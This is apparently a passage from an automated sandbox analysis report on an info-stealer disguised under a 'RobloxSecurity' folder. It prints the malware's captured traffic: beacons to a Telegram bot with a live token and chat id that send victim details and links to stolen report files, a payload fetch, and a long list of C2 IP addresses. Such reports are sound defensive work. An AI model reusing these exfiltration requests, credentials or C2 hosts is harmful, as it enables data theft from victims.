                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe | Code function: 4x nop then jmp 00007FFD9B984622h | 42_2_00007FFD9B983E71
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe | Code function: 4x nop then jmp 00007FFD9B9845F6h | 42_2_00007FFD9B984574
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe | Code function: 4x nop then jmp 00007FFD9B984622h | 42_2_00007FFD9B984574
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe | Code function: 4x nop then jmp 00007FFD9B98771Ch | 42_2_00007FFD9B987519
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe | Code function: 4x nop then dec eax | 44_2_00007FFD9B966AB0
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe | Code function: 4x nop then jmp 00007FFD9B96771Ch | 44_2_00007FFD9B967519
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe | Code function: 4x nop then dec eax | 45_2_00007FFD9B996290
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe | Code function: 4x nop then jmp 00007FFD9B994622h | 45_2_00007FFD9B9945E1
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe | Code function: 4x nop then jmp 00007FFD9B9945F6h | 45_2_00007FFD9B994574
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe | Code function: 4x nop then jmp 00007FFD9B99730Ch | 45_2_00007FFD9B997109

                  Networking

                  Source: unknown | DNS query: name: api.telegram.org
                  Source: Yara match | File source: 0.2.jqOHOuPMJP.exe.3e4a9f8.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exe, type: DROPPED
                  Source: Yara match | File source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe, type: DROPPED
                  Source: global traffic | TCP traffic: 192.168.2.4:49738 -> 185.119.118.59:8080
                  Source: global traffic | HTTP traffic detected: GET /bot6352251597:AAF6uxZ1z4xhnUTnQP5u36WV5EeOgP0W_YY/sendMessage?chat_id=5169773349&text=%23Default%20%20%23Beacon%0A%0A%3Cb%3EOS%3A%3C%2Fb%3E%20%3Ci%3EMicrosoft%20Windows%20NT%206.2.9200.0%3C%2Fi%3E%0A%3Cb%3ECountry%3A%3C%2Fb%3E%20%3Ci%3EUnited%20States%3C%2Fi%3E%0A%3Cb%3EUsername%3A%3C%2Fb%3E%20%3Ci%3Euser%3C%2Fi%3E%0A%3Cb%3ECompname%3A%3C%2Fb%3E%20%3Ci%3E468325%3C%2Fi%3E%0A%0A%3Cb%3EReport%20size%3A%3C%2Fb%3E%200.16Mb%0A&reply_markup=%7B%22inline_keyboard%22%3A%5B%5B%7B%22text%22%3A%22Download%22%2C%22url%22%3A%22http%3A%2F%2F185.119.118.59%3A8080%2Fget%2FT4zYCSr1rm%2F41r0r_user%40468325_report.wsr%22%7D%2C%7B%22text%22%3A%22Open%22%2C%22url%22%3A%22http%3A%2F%2F127.0.0.1%3A18772%2FhandleOpenWSR%3Fr%3Dhttp%3A%2F%2F185.119.118.59%3A8080%2Fget%2FT4zYCSr1rm%2F41r0r_user%40468325_report.wsr%22%7D%5D%5D%7D&parse_mode=HTML HTTP/1.1 | Host: api.telegram.org | Connection: Keep-Alive
                  Source: global traffic | HTTP traffic detected: GET /bot6352251597:AAF6uxZ1z4xhnUTnQP5u36WV5EeOgP0W_YY/sendMessage?chat_id=5169773349&text=%23Default%20%20%23Beacon%0A%0A%3Cb%3EOS%3A%3C%2Fb%3E%20%3Ci%3EMicrosoft%20Windows%20NT%206.2.9200.0%3C%2Fi%3E%0A%3Cb%3ECountry%3A%3C%2Fb%3E%20%3Ci%3EUnited%20States%3C%2Fi%3E%0A%3Cb%3EUsername%3A%3C%2Fb%3E%20%3Ci%3Euser%3C%2Fi%3E%0A%3Cb%3ECompname%3A%3C%2Fb%3E%20%3Ci%3E468325%3C%2Fi%3E%0A%0A%3Cb%3EReport%20size%3A%3C%2Fb%3E%200.16Mb%0A&reply_markup=%7B%22inline_keyboard%22%3A%5B%5B%7B%22text%22%3A%22Download%22%2C%22url%22%3A%22http%3A%2F%2F185.119.118.59%3A8080%2Fget%2Fs9VbfeJdTs%2FhkLYW_user%40468325_report.wsr%22%7D%2C%7B%22text%22%3A%22Open%22%2C%22url%22%3A%22http%3A%2F%2F127.0.0.1%3A18772%2FhandleOpenWSR%3Fr%3Dhttp%3A%2F%2F185.119.118.59%3A8080%2Fget%2Fs9VbfeJdTs%2FhkLYW_user%40468325_report.wsr%22%7D%5D%5D%7D&parse_mode=HTML HTTP/1.1 | Host: api.telegram.org | Connection: Keep-Alive
                  Source: global traffic | HTTP traffic detected: GET /bot6352251597:AAF6uxZ1z4xhnUTnQP5u36WV5EeOgP0W_YY/sendMessage?chat_id=5169773349&text=%23Default%20%23Heartbeat%20received%20from%20beacon%0A%0A%3Cb%3EOS%3A%3C%2Fb%3E%20%3Ci%3EMicrosoft%20Windows%20NT%206.2.9200.0%3C%2Fi%3E%0A%3Cb%3ECountry%3A%3C%2Fb%3E%20%3Ci%3EUnited%20States%3C%2Fi%3E%0A%3Cb%3EUsername%3A%3C%2Fb%3E%20%3Ci%3Euser%3C%2Fi%3E%0A%3Cb%3ECompname%3A%3C%2Fb%3E%20%3Ci%3E468325%3C%2Fi%3E%0A%0A%3Cb%3EServing%20on%3A%3C%2Fb%3E%20%3Ci%3Ehttps%3A%2F%2Fe483612b93e055308d0c85f365c474ee.serveo.net%3C%2Fi%3E%0A%0A&parse_mode=HTML HTTP/1.1 | Host: api.telegram.org | Connection: Keep-Alive
                  Source: global traffic | HTTP traffic detected: GET /bot6352251597:AAF6uxZ1z4xhnUTnQP5u36WV5EeOgP0W_YY/sendMessage?chat_id=5169773349&text=%23Default%20%23Heartbeat%20received%20from%20beacon%0A%0A%3Cb%3EOS%3A%3C%2Fb%3E%20%3Ci%3EMicrosoft%20Windows%20NT%206.2.9200.0%3C%2Fi%3E%0A%3Cb%3ECountry%3A%3C%2Fb%3E%20%3Ci%3EUnited%20States%3C%2Fi%3E%0A%3Cb%3EUsername%3A%3C%2Fb%3E%20%3Ci%3Euser%3C%2Fi%3E%0A%3Cb%3ECompname%3A%3C%2Fb%3E%20%3Ci%3E468325%3C%2Fi%3E%0A%0A%3Cb%3EServing%20on%3A%3C%2Fb%3E%20%3Ci%3Ehttps%3A%2F%2Fe2111f95f52ba8be6b2d3394e38b1722.serveo.net%3C%2Fi%3E%0A%0A&parse_mode=HTML HTTP/1.1 | Host: api.telegram.org | Connection: Keep-Alive
                  Source: global traffic | HTTP traffic detected: GET /byte/@jokerbot880901.txt HTTP/1.1 | Host: 82.147.85.194 | Connection: Keep-Alive
                  Source: global traffic | HTTP traffic detected: GET /line?fields=query,country HTTP/1.1 | Host: ip-api.com | Connection: Keep-Alive
                  Source: global traffic | HTTP traffic detected: GET /line?fields=query,country HTTP/1.1 | Host: ip-api.com | Connection: Keep-Alive
                  Source: Joe Sandbox View | IP Address: 82.147.85.194 82.147.85.194
                  Source: Joe Sandbox View | IP Address: 208.95.112.1 208.95.112.1
                  Source: Joe Sandbox View | JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                  Source: unknown | DNS query: name: ip-api.com
                  Source: unknown | TCP traffic detected without corresponding DNS query: 82.147.85.194 (50 identical entries)
                  Source: unknown | DNS traffic detected: queries for: ip-api.com
                  Source: vkefq4cv.oil.exe, 00000004.00000002.1822502459.000001F997DF1000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000000B.00000002.4118051146.000001B8AB951000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD73F1000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002A.00000002.2312217329.0000017A00001000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002C.00000002.2953825020.000001EC019D3000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002D.00000002.3553295709.00000167D1783000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://104.248.208.221:80
                  Source: vkefq4cv.oil.exe, 00000004.00000002.1822502459.000001F997DF1000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000000B.00000002.4118051146.000001B8AB951000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD73F1000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002A.00000002.2312217329.0000017A00001000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002C.00000002.2953825020.000001EC019D3000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002D.00000002.3553295709.00000167D1783000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://107.161.20.142:8080
                  Source: vkefq4cv.oil.exe, 00000004.00000002.1822502459.000001F997DF1000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000000B.00000002.4118051146.000001B8AB951000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD73F1000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002A.00000002.2312217329.0000017A00001000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002C.00000002.2953825020.000001EC019D3000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002D.00000002.3553295709.00000167D1783000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://116.202.101.219:8080
                  Source: vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD8610000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://127.0.0.1:
                  Source: vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD854A000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://127.0.0.1:18772/handleOpenWSR?r=
                  Source: vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD859B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://127.0.0.1:18772/handleOpenWSR?r=http://185.119.118.59:8080/get/s9VbfeJdTs/hkLYW_user
                  Source: vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD8610000.00000004.00000800.00020000.00000000.sdmp, hahahahaha.txt.18.dr | String found in binary or memory: http://127.0.0.1:6787/
                  Source: vkefq4cv.oil.exe, 0000000B.00000002.4118051146.000001B8AB9D5000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD853B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://127.0.0.1:6787/ing=no
                  Source: vkefq4cv.oil.exe, 00000004.00000002.1822502459.000001F997DF1000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000000B.00000002.4118051146.000001B8AB951000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD73F1000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002A.00000002.2312217329.0000017A00001000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002C.00000002.2953825020.000001EC019D3000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002D.00000002.3553295709.00000167D1783000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://129.151.109.160:8080
                  Source: vkefq4cv.oil.exe, 00000004.00000002.1822502459.000001F997DF1000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000000B.00000002.4118051146.000001B8AB951000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD73F1000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002A.00000002.2312217329.0000017A00001000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002C.00000002.2953825020.000001EC019D3000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002D.00000002.3553295709.00000167D1783000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://144.126.132.141:8080
                  Source: vkefq4cv.oil.exe, 00000004.00000002.1822502459.000001F997DF1000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000000B.00000002.4118051146.000001B8AB951000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD73F1000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002A.00000002.2312217329.0000017A00001000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002C.00000002.2953825020.000001EC019D3000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002D.00000002.3553295709.00000167D1783000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://149.88.44.159:80
                  Source: vkefq4cv.oil.exe, 00000004.00000002.1822502459.000001F997DF1000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000000B.00000002.4118051146.000001B8AB951000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD73F1000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002A.00000002.2312217329.0000017A00001000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002C.00000002.2953825020.000001EC019D3000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002D.00000002.3553295709.00000167D1783000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://154.26.128.6:80
                  Source: vkefq4cv.oil.exe, 00000004.00000002.1822502459.000001F997DF1000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000000B.00000002.4118051146.000001B8AB951000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD73F1000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002A.00000002.2312217329.0000017A00001000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002C.00000002.2953825020.000001EC019D3000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002D.00000002.3553295709.00000167D1783000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://18.228.80.130:80
                  Source: vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD8515000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://185.119.118.59
                  Source: vkefq4cv.oil.exe, 0000002A.00000002.2312217329.0000017A00001000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002C.00000002.2953825020.000001EC019D3000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002D.00000002.3553295709.00000167D1783000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://185.119.118.59:8080
                  Source: vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD8515000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://185.119.118.59:8080/%68%6B%4C%59%57%5F%6A%6F%6E%65%73%40%34%36%38%33%32%35%5F%72%65%70%6F%72%
                  Source: vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD854A000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://185.119.118.59:8080/get
                  Source: vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD859B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://185.119.118.59:8080/get/s9VbfeJdTs/hkLYW_user
                  Source: vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD8515000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://185.119.118.59:8080/hkLYW_user
                  Source: vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD8515000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://185.119.118.59:8080/hkLYW_user%40468325_report.wsr
                  Source: vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD854A000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://185.119.118.59:8080/s9VbfeJdTs/hkLYW_user
                  Source: vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD8515000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://185.119.118.59:80802
                  Source: vkefq4cv.oil.exe, 00000004.00000002.1822502459.000001F997DF1000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000000B.00000002.4118051146.000001B8AB951000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD73F1000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002A.00000002.2312217329.0000017A00001000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002C.00000002.2953825020.000001EC019D3000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002D.00000002.3553295709.00000167D1783000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://185.217.98.121:80
                  Source: vkefq4cv.oil.exe, 00000004.00000002.1822502459.000001F997DF1000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000000B.00000002.4118051146.000001B8AB951000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD73F1000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002A.00000002.2312217329.0000017A00001000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002C.00000002.2953825020.000001EC019D3000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002D.00000002.3553295709.00000167D1783000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://185.217.98.121:8080
                  Source: vkefq4cv.oil.exe, 00000004.00000002.1822502459.000001F997DF1000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000000B.00000002.4118051146.000001B8AB951000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD73F1000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002A.00000002.2312217329.0000017A00001000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002C.00000002.2953825020.000001EC019D3000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002D.00000002.3553295709.00000167D1783000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://193.142.58.127:80
                  Source: vkefq4cv.oil.exe, 00000004.00000002.1822502459.000001F997DF1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://193.142.58.127:80Pk
                  Source: vkefq4cv.oil.exe, 00000004.00000002.1822502459.000001F997DF1000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000000B.00000002.4118051146.000001B8AB951000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD73F1000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002A.00000002.2312217329.0000017A00001000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002C.00000002.2953825020.000001EC019D3000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002D.00000002.3553295709.00000167D1783000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://206.189.109.146:80
                  Source: vkefq4cv.oil.exe, 00000004.00000002.1822502459.000001F997DF1000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000000B.00000002.4118051146.000001B8AB951000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD73F1000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002A.00000002.2312217329.0000017A00001000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002C.00000002.2953825020.000001EC019D3000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002D.00000002.3553295709.00000167D1783000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://212.6.44.53:8080
                  Source: vkefq4cv.oil.exe, 00000004.00000002.1822502459.000001F997DF1000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000000B.00000002.4118051146.000001B8AB951000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD73F1000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002A.00000002.2312217329.0000017A00001000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002C.00000002.2953825020.000001EC019D3000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002D.00000002.3553295709.00000167D1783000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://216.250.190.139:80
                  Source: vkefq4cv.oil.exe, 00000004.00000002.1822502459.000001F997DF1000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000000B.00000002.4118051146.000001B8AB951000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD73F1000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002A.00000002.2312217329.0000017A00001000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002C.00000002.2953825020.000001EC019D3000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002D.00000002.3553295709.00000167D1783000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://23.224.102.6:8001
                  Source: vkefq4cv.oil.exe, 00000004.00000002.1822502459.000001F997DF1000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000000B.00000002.4118051146.000001B8AB951000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD73F1000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002A.00000002.2312217329.0000017A00001000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002C.00000002.2953825020.000001EC019D3000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002D.00000002.3553295709.00000167D1783000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://23.248.176.37:180
                  Source: vkefq4cv.oil.exe, 00000004.00000002.1822502459.000001F997DF1000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000000B.00000002.4118051146.000001B8AB951000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD73F1000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002A.00000002.2312217329.0000017A00001000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002C.00000002.2953825020.000001EC019D3000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002D.00000002.3553295709.00000167D1783000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.61.136.13:80
                  Source: vkefq4cv.oil.exe, 00000004.00000002.1822502459.000001F997DF1000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000000B.00000002.4118051146.000001B8AB951000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD73F1000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002A.00000002.2312217329.0000017A00001000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002C.00000002.2953825020.000001EC019D3000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002D.00000002.3553295709.00000167D1783000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.61.136.52:80
                  Source: vkefq4cv.oil.exe, 00000004.00000002.1822502459.000001F997DF1000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000000B.00000002.4118051146.000001B8AB951000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD73F1000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002A.00000002.2312217329.0000017A00001000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002C.00000002.2953825020.000001EC019D3000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002D.00000002.3553295709.00000167D1783000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://66.42.56.128:80
                  Source: jqOHOuPMJP.exe, 00000000.00000002.1817122140.0000000002D84000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://82.147.85
                  Source: jqOHOuPMJP.exe, 00000000.00000002.1817122140.0000000002DAA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://82.147.85.194
                  Source: jqOHOuPMJP.exe, 00000000.00000002.1817122140.0000000002D84000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://82.147.85.194/byte/
                  Source: vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD8574000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD85C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://api.telegram.org
                  Source: vkefq4cv.oil.exe, 0000000B.00000002.4115442750.000001B8A9D61000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.v
                  Source: vkefq4cv.oil.exe, 0000000B.00000002.4118051146.000001B8AB9E2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://e2111f95f52ba8be6b2d3394e38b1722.serveo.net:6787//e2111f95f52ba8be6b2d3394e38b1722.serveo.net
                  Source: vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD7480000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ip-api.com
                  Source: vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD7480000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ip-api.com/line?fields=query
                  Source: powershell.exe, 00000001.00000002.1715254235.000000000617A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                  Source: powershell.exe, 00000001.00000002.1717594364.000000000785F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/i?
                  Source: powershell.exe, 00000001.00000002.1712328855.0000000005266000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                  Source: powershell.exe, 00000001.00000002.1712328855.0000000005266000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 00000004.00000002.1822502459.000001F997DF1000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000000B.00000002.4118051146.000001B8AB951000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD73F1000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002A.00000002.2312217329.0000017A00001000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002C.00000002.2953825020.000001EC01A44000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002D.00000002.3553295709.00000167D17F4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
                  Source: jqOHOuPMJP.exe, 00000000.00000002.1817122140.0000000002D21000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1712328855.0000000005111000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 00000004.00000002.1822502459.000001F997F9F000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000000B.00000002.4118051146.000001B8AB951000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD73F1000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002A.00000002.2312217329.0000017A001B2000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002C.00000002.2953825020.000001EC01B62000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002D.00000002.3553295709.00000167D1912000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
